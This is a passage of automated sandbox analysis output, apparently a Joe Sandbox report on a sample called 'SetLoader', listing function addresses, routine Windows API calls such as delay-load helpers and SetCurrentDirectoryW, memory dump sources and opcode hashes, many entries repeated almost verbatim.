                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 310c5b0e8cfdda9c602d1719cefca5764b134216d031a4d53a05d5d2166c2d6e
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: 310c5b0e8cfdda9c602d1719cefca5764b134216d031a4d53a05d5d2166c2d6e
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f255c0e32885561adfe9cfd0eb22f395ed76b7923619218a2578012392686b4e
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: f255c0e32885561adfe9cfd0eb22f395ed76b7923619218a2578012392686b4e
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0063068E
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: eb027dc107553e96dd4936476234a3ebcd9a7651e36b595536c921ba8cd36689
                                              • Instruction ID: 4c9915c8b93282a1947d7b21c01c0cd276fa4d34205b3c971dfd090c67955b5e
                                              • Opcode Fuzzy Hash: eb027dc107553e96dd4936476234a3ebcd9a7651e36b595536c921ba8cd36689
                                              • Instruction Fuzzy Hash: 5EA001EA2A9547FC32596295AD27C3F025ED8CAB65B328D6EF40AC4085A881289A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: fa0b5aeb9b586271d1b88079048570c3270dfe63f212f7e3b3e2806dcb216566
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: fa0b5aeb9b586271d1b88079048570c3270dfe63f212f7e3b3e2806dcb216566
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: b01e23320ac03632f4c5cc84967313c101b3e2a322f013e85b0d32d0921f8b08
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: b01e23320ac03632f4c5cc84967313c101b3e2a322f013e85b0d32d0921f8b08
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 0e1ab340b80b15a4b22c00098dda26166e821c56d7d0ffccf09c2c0aef7b9b3d
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: 0e1ab340b80b15a4b22c00098dda26166e821c56d7d0ffccf09c2c0aef7b9b3d
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 25ba863af03c394b5a97f1c9d4935373427c00bda12d30d3299e0754571bdf22
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: 25ba863af03c394b5a97f1c9d4935373427c00bda12d30d3299e0754571bdf22
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 36b3650132cbceee29633abde502955a9f1cc0640059d3fe4f46a803ab5ffef1
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: 36b3650132cbceee29633abde502955a9f1cc0640059d3fe4f46a803ab5ffef1
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: f27168a2567bca7bcce1ad86597c023e32521d50a2d6655c4744b19628231599
                                              • Instruction ID: 036e2395bc42d0dad21bb42c16116eb74e2d937c806a83b3fbf22ec8015b1ef7
                                              • Opcode Fuzzy Hash: f27168a2567bca7bcce1ad86597c023e32521d50a2d6655c4744b19628231599
                                              • Instruction Fuzzy Hash: 83A001962A9116FC36496295AD26C3A125ED8C8B65B318D6EF51AC4082A890288A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006308A7
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: a47d22b8f3dfb6bc75e11c48c5baccf1f7f43a3dc9caf229dc2e035cf8a63e91
                                              • Instruction ID: a2a4bf2eaebdb78bd7e6917a3df77c2106ddc3858ce8a557b05dbce4ff546ff1
                                              • Opcode Fuzzy Hash: a47d22b8f3dfb6bc75e11c48c5baccf1f7f43a3dc9caf229dc2e035cf8a63e91
                                              • Instruction Fuzzy Hash: 79A001962A9215BC364962A5AD26C3A225ED8C4B25B3189AEF519D4086A890288A50B5
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 594dbb2afa4a42be2e394973022a2e6bcbf5b1124cbf2c983357d1e988146c72
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 594dbb2afa4a42be2e394973022a2e6bcbf5b1124cbf2c983357d1e988146c72
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 2dc927add82ddd1c53fb4de25aeea4065570dd2d0ca3c64bd6e47f05ad8ed6cc
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 2dc927add82ddd1c53fb4de25aeea4065570dd2d0ca3c64bd6e47f05ad8ed6cc
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 55267243fb9f09d6d662bc4e571c32d251c4394c4f6b8dcf5f00b292fac91663
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 55267243fb9f09d6d662bc4e571c32d251c4394c4f6b8dcf5f00b292fac91663
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              APIs
                                              • ___delayLoadHelper2@8.DELAYIMP ref: 006309FC
                                                • Part of subcall function 00630D3A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00630DAD
                                                • Part of subcall function 00630D3A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00630DBE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                              • String ID:
                                              • API String ID: 1269201914-0
                                              • Opcode ID: 01dfff51263e623372cd0a5e2b3fc11ca204404ee414ca12dde5f2a4b3345cb0
                                              • Instruction ID: 8de8849a76919918b2818da4d79a5ab690285acb50b8edc38d33c7f594e7bd54
                                              • Opcode Fuzzy Hash: 01dfff51263e623372cd0a5e2b3fc11ca204404ee414ca12dde5f2a4b3345cb0
                                              • Instruction Fuzzy Hash: 80A012C139C001FC31051240AD22C36014EC4C4B51730892DF001C0081544018090070
                                              APIs
                                              • SetEndOfFile.KERNELBASE(?,0061A712,?,?,?,?,?,?,?), ref: 0061B94C
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: File
                                              • String ID:
                                              • API String ID: 749574446-0
                                              • Opcode ID: 0d97c896962943c382b3170a43798a8d2eab6d6ec2b460b90b28ca344828cdf5
                                              • Instruction ID: aaf9e06ffcc21920b90501862ae1a73b1e1958d3c0445596390a66564105ac87
                                              • Opcode Fuzzy Hash: 0d97c896962943c382b3170a43798a8d2eab6d6ec2b460b90b28ca344828cdf5
                                              • Instruction Fuzzy Hash: 9AA0113808000A8ACE002B30CA0800C3B22EB22BC030022A8A00BCA0A2CB22880B8A02
                                              APIs
                                              • SetCurrentDirectoryW.KERNELBASE(?), ref: 0062CBBA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2947210862.0000000000611000.00000020.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                                              • Associated: 00000000.00000002.2947119940.0000000000610000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947328933.0000000000646000.00000002.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000652000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000659000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000672000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947702980.0000000000676000.00000004.00000001.01000000.00000003.sdmp
                                              • Associated: 00000000.00000002.2947871076.0000000000677000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_610000_SetLoader.jbxd
                                              Similarity
                                              • API ID: CurrentDirectory
                                              • String ID:
                                              • API String ID: 1611563598-0
                                              • Opcode ID: de2d65f119c3842ccae9a1551458973b8ebc99fa5b9dc372f3b3d1a274d194af
                                              • Instruction ID: ffd1b6503bd043d0fc80031a23ddff853341ecd2734b5adcb477002c60083b17
                                              • Opcode Fuzzy Hash: de2d65f119c3842ccae9a1551458973b8ebc99fa5b9dc372f3b3d1a274d194af
                                              • Instruction Fuzzy Hash: B6A011B02002008BA3000B32CF0AA0EBAAAAFA3A00F00C028B00280030CB3288B0AA02
                                              APIs
                                                • Part of subcall function 0062D5DD: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 0062D6C7
                                                • Part of subcall function 0062C5DD: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0062C5E5
